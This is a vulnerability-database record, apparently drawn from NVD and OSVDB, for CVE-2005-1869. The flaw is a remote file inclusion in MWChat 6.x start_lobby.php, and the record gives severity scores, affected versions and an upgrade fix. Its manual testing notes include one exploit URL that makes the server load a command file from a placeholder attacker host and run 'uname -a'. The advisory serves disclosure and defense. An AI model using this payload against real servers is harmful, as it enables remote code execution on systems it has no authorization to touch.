{"id": "CVE-2005-1869", "bulletinFamily": "NVD", "title": "CVE-2005-1869", "description": "PHP remote file inclusion vulnerability in start_lobby.php in MWChat 6.x allows remote attackers to execute arbitrary PHP code via the CONFIG[MWCHAT_Libs] parameter.", "published": "2005-06-07T04:00:00", "modified": "2008-09-05T20:50:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1869", "reporter": "cve@mitre.org", "references": ["http://www.securitytracker.com/alerts/2005/Jun/1014090.html", "http://www.osvdb.org/17087", "http://www.defacers.com.mx/advisories/4.txt", "http://secunia.com/advisories/15596", "http://www.appindex.net"], "cvelist": ["CVE-2005-1869"], "type": "cve", "lastseen": "2020-12-09T19:22:20", "edition": 5, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:17087"]}], "modified": "2020-12-09T19:22:20", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2020-12-09T19:22:20", "rev": 2}, "vulnersScore": 7.2}, "cpe": ["cpe:/a:appindex:mwchat:6.7"], "affectedSoftware": [{"cpeName": "appindex:mwchat", "name": "appindex mwchat", "operator": "le", "version": "6.7"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": true, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:appindex:mwchat:6.7:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:appindex:mwchat:6.7:*:*:*:*:*:*:*", "versionEndIncluding": "6.7", "vulnerable": true}], "operator": "OR"}]}}

{"osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-1869"], "edition": 1, "description": "## Vulnerability Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nIt has been reported that the vendor's distribution file ships with .htaccess files which protect several directories. This flaw is only exploitable if the .htaccess file has been removed.\n## Solution Description\nUpgrade to version 6.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nMWChat contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to start_lobby.php not properly sanitizing user input supplied to the CONFIG[MWCHAT_Libs] variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[victim]/mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://[attacker]/cmd.txt?&cmd=uname -a\n## References:\nVendor URL: http://www.appindex.net/products/detail/?product=mwchat\nVendor URL: http://www.appindex.net\nSecurity Tracker: 1014090\n[Secunia Advisory ID:15596](https://secuniaresearch.flexerasoftware.com/advisories/15596/)\nOther Advisory URL: http://www.defacers.com.mx/advisories/4.txt\nISS X-Force ID: 20865\n[CVE-2005-1869](https://vulners.com/cve/CVE-2005-1869)\n", "modified": "2005-06-01T08:12:26", "published": "2005-06-01T08:12:26", "href": "https://vulners.com/osvdb/OSVDB:17087", "id": "OSVDB:17087", "title": "MWChat start_lobby.php Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}